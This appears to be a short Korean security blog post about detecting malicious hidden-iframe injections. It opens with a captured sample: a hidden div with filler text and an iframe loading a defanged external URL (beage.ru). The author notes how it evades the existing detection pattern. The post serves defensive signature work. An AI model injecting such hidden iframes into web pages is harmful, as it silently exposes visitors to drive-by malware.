<body bgcolor="#000000"><div style="display:none">ifkujtsasiumelcsgzbuzprmotxoetb<iframe width=933 height=353 src="hxxp://beage.ru:8080/index.php" ></iframe></div>
역시 이지스(bscry)가 제공해준 코드 입니다.
젠장 순서 바뀌는 것도 생각해봐야하고 갈수록 교묘해지네요..
style="display:none" 사용하는 방법도 있네요..
아래 포스팅된걸로는 탐지되지 않습니다.. 한 패턴으로 여러개를 잡는게 좋긴한데..너무 복잡해지네요..
복잡할수록 오탐의 가능성은 커지는데..
'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글
보안장비 정책 설정 중 특이 로그 발견-1 (0) | 2012.03.09 |
---|---|
카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요 (1) | 2011.04.04 |
ZeroBoard PHP Mass Sql-Injection(download.php) (0) | 2010.01.26 |
IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법) (1) | 2009.10.21 |
iframe 신종(?) 우회 방법 (0) | 2009.10.08 |